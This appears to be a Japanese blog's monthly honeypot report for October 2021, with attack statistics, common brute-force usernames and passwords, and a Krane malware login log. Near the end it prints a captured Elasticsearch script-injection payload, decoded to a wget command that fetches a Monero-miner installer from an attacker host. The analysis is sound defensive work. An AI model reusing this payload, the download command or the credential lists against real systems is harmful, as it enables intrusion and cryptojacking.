ハニーポット運用(月次報告:2021年10月)
今月のTopics
2021年10月04日にApache HTTP Serverにてパストラバーサルの脆弱性(CVE-2021-41773)に対する修正バージョンがリリースされた。
バージョン2.4.49のみが該当する脆弱性であり、2.4.50へのアップデートで解消される見込みであったが、2021年10月8日に2.4.50では別のパストラバーサルの脆弱性(CVE-2021-42013)があることが判明し、修正バージョン(2.4.51)がリリースされた。
※うちのハニーポットにはアクセスを確認できず。割と限定的な攻撃?
本脆弱性の影響を受けるのは以下条件に該当する場合になる。
- ドキュメントルート外のファイルが
require all deniedパラメータにより制限されていない mod_cgiモジュールが有効化されている。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年10月1日-2021年10月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 883,709 | ▲1,844,739 |
| 2 | Honeytrap | 749,919 | ▲523,547 |
| 3 | Dionaea | 419,244 | ▲362,080 |
| 4 | Heralding | 290,754 | ▲335,103 |
| 5 | Rdpy | 76,148 | ▲82,493 |
| 6 | Adbhoney | 15,789 | ▲15,146 |
| 7 | Mailoney | 10,615 | ▲3,724 |
| 8 | ElasticPot | 2,733 | ▲5,618 |
| 9 | CitrixHoneypot | 1,568 | ▲1,490 |
| 10 | ConPot | 1,387 | ▲1,817 |
| 11 | Ciscoasa | 1,258 | ▲33,653 |
| 12 | Medpot | 711 | ▲121 |
| 13 | Tanner | 83 | ▲2,966 |
- Result
- 先月と比較して全体のアクセス数が減少
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Russia | 568,461 | 2(↑) |
| 2 | Netherlands | 474,562 | 1(↓) |
| 3 | China | 394,075 | 3(→) |
| 4 | United States | 231,655 | 4(→) |
| 5 | India | 75,841 | 9(↑) |
| 6 | Vietnam | 71,655 | 11(↑) |
| 7 | Brazil | 46,562 | 13(↑) |
| 8 | South Korea | 33,219 | 14(↑) |
| 9 | Indonesia | 29,821 | 17(↑) |
| 10 | Taiwan | 28,075 | 圏外(↑) |
| 11 | Japan | 24,998 | 10(↓) |
| 12 | Latvia | 24,889 | 16(↑) |
| 13 | Sweden | 24,718 | 19(↑) |
| 14 | Germany | 24,673 | 15(↑) |
| 15 | Monaco | 19,813 | 圏外(↑) |
| 16 | Singapore | 19,274 | 8(↓) |
| 17 | Mexico | 17,223 | 圏外(↑) |
| 18 | Thailand | 15,931 | 圏外(↑) |
| 19 | Ukraine | 14,398 | 圏外(↑) |
| 20 | Hong Kong | 14,314 | 圏外(↑) |
- Result
- アクセス数上位の国に変動は無し。
- 10位以下のアクセス数について先月では圏外だった国がランクインしていた。全体のアクセス数が減少したことで普段ランクインしない国からのアクセスが目立った印象。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,405,632 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 259 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 22 |
| 4 | CVE-2020-11910 | 8 |
| 5 | CVE-2020-8515 CVE-2020-8515 | 1 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 82,429 |
| 2 | admin | 5,917 |
| 3 | hadoop | 4,281 |
| 4 | user | 2,719 |
| 5 | sa | 2,717 |
| 6 | oracle | 1,616 |
| 7 | knockknockwhosthere | 1,568 |
| 8 | mysql | 1,568 |
| 9 | git | 1,554 |
| 10 | huawei | 1,508 |
| 11 | 22 | 1,398 |
| 12 | postgres | 1,239 |
| 13 | (empty) | 956 |
| 14 | !root | 705 |
| 15 | 2Wire | 698 |
| 16 | guest | 645 |
| 17 | support | 480 |
| 18 | nproc | 403 |
| 19 | 0 | 369 |
| 20 | test | 364 |
| 21 | blank | 353 |
| 22 | 666666 | 352 |
| 23 | adm | 351 |
| 24 | debug | 350 |
| 25 | unknown | 339 |
| 26 | anonymous | 261 |
| 27 | sh | 253 |
| 28 | www | 239 |
| 29 | pi | 236 |
| 30 | ftp | 230 |
| 31 | Admin | 199 |
| 32 | web | 184 |
| 33 | data | 180 |
| 34 | db | 179 |
| 35 | wwwroot | 173 |
| 36 | administrator | 166 |
| 37 | ubuntu | 153 |
| 38 | ftpuser | 121 |
| 39 | info | 85 |
| 40 | backup | 75 |
| 41 | helpdesk | 72 |
| 42 | manager | 72 |
| 43 | 71 | |
| 44 | contact | 70 |
| 45 | microsoft | 70 |
| 46 | office | 70 |
| 47 | scan | 70 |
| 48 | smtp | 70 |
| 49 | spam | 70 |
| 50 | www-data | 63 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 19,693 |
| 2 | (empty) | 3,426 |
| 3 | root | 1,771 |
| 4 | knockknockwhosthere | 1,568 |
| 5 | 1 | 1,255 |
| 6 | blank | 1,045 |
| 7 | 123456 | 1,017 |
| 8 | password | 919 |
| 9 | 12345 | 769 |
| 10 | 0 | 529 |
| 11 | Password | 487 |
| 12 | user | 482 |
| 13 | 1234 | 473 |
| 14 | 666666 | 425 |
| 15 | 123 | 421 |
| 16 | ubnt | 405 |
| 17 | nproc | 403 |
| 18 | 0 | 401 |
| 19 | support | 393 |
| 20 | master | 390 |
| 21 | alpine | 387 |
| 22 | !ishtar | 362 |
| 23 | backup | 359 |
| 24 | hi3518 | 358 |
| 25 | synnet | 350 |
| 26 | unknown | 340 |
| 27 | 1q2w3e4r | 319 |
| 28 | 12345678 | 315 |
| 29 | test | 247 |
| 30 | Passw0rd | 219 |
| 31 | x | 205 |
| 32 | 1qaz2wsx | 199 |
| 33 | admin123 | 160 |
| 34 | 123456789 | 152 |
| 35 | abc123 | 152 |
| 36 | iloveyou | 135 |
| 37 | 111111 | 120 |
| 38 | 123123 | 118 |
| 39 | 1234567890 | 116 |
| 40 | 1234567 | 115 |
| 41 | qwerty | 110 |
| 42 | 0 | 109 |
| 43 | hadoop | 93 |
| 44 | Nr!_CapiBraksjdlfS@4827fVfg1 | 88 |
| 45 | raspberry | 87 |
| 46 | 321 | 86 |
| 47 | system | 86 |
| 48 | 123qwe | 85 |
| 49 | postgres | 83 |
| 50 | test123 | 82 |
- Result
- Nr!_CapiBraksjdlfS@4827fVfg1(44位)は
Krane Malwareのアクセスになる。
- Nr!_CapiBraksjdlfS@4827fVfg1(44位)は
アクセスログを抽出した結果は以下の通り。
| No | username | password | city_name | ip | country_name |
|---|---|---|---|---|---|
| 1 | root | Nr!_CapiBraksjdlfS@3111fVfg1 | - | 106[.]244[.]10[.]2 | South Korea |
| 2 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 3 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 4 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 5 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 6 | git | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 7 | tomcat | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 8 | web | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 9 | cisco | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 10 | www | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 11 | steam | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 12 | rustserver | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 13 | hduser | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 14 | csgo | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 15 | carlos | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 16 | pgsql | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 17 | ftpadmin | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 18 | docker | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 19 | ts3server | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 20 | ftp | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 21 | wpuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 22 | wordpress | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 23 | rudder | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 24 | mcserver | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 25 | ts3 | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 26 | administrator | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 27 | admin | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 28 | deploy | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 29 | root | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 30 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 31 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 32 | test | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 33 | root@localhost | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 34 | ubuntu | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 35 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 36 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 37 | ansible | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 38 | oracle | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 39 | hadoop | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 40 | centos | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 41 | postgres | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 42 | ftpuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 43 | odoo | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 44 | esuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 45 | vagrant | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 46 | guest | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 47 | minecraft | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 48 | joplin | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 49 | cms | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 50 | cmsuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 51 | rust | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 52 | user | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 53 | jenkins | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 54 | mysql | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 55 | nagios | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 56 | deployer | Nr!_CapiBraksjdlfS@4827fVfg1 | Atlanta | 198[.]98[.]48[.]67 | United States |
| 57 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]253[.]199 | United States |
| 58 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]253[.]199 | United States |
| 59 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 60 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 61 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 62 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Buffalo | 199[.]195[.]254[.]38 | United States |
| 63 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 64 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 65 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 66 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | San Jose | 205[.]185[.]113[.]224 | United States |
| 67 | web | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]40[.]193 | United States |
| 68 | git | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]40[.]193 | United States |
| 69 | cisco | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]40[.]193 | United States |
| 70 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]42[.]170 | United States |
| 71 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Las Vegas | 209[.]141[.]42[.]170 | United States |
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- 10月はセキュリティイベントが目白押しで楽しみな反面、通常業務以外の作業が多いので乗り切れて安堵している。
- CodeBlue のセッション動画は再度1日かけて全て見直したいと思う。
個人的にはAVTokyoに(オンラインだけど)初参加できて良かった。AVTOKYO バッジキット購入のため、山手線の移動ルートを考えながら追いついたのが一番の思い出。来年は自宅でOpen xINT CTFにも参加してみたい。
IPアドレス:120[.]79[.]156[.]2
Payload :
{"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)49+(char)56+(char)53+(char)46+(char)49+(char)56+(char)49+(char)46+(char)49+(char)48+(char)46+(char)50+(char)51+(char)52+(char)47+(char)69+(char)53+(char)68+(char)66+(char)48+(char)69+(char)48+(char)55+(char)67+(char)51+(char)68+(char)55+(char)66+(char)69+(char)56+(char)48+(char)86+(char)53+(char)50+(char)48+(char)47+(char)105+(char)110+(char)105+(char)116+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}},"size":1}
↓
文字コード部分をPrintable形式にすると以下になる。
↓
wget http://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo
仮想通貨Moneroのminerをインストールさせるmalwareのようだ。
ELF binary #1:
— Vess (@VessOnSecurity) 2020年4月18日
http[:]//185.181.10.234/E5DB0E07C3D7BE80V520/networkservicehttps://t.co/iOCBqwWSR1
ELF binary #2:
http[:]//185.181.10.234/E5DB0E07C3D7BE80V520/sysguardhttps://t.co/M6OWCW9U82
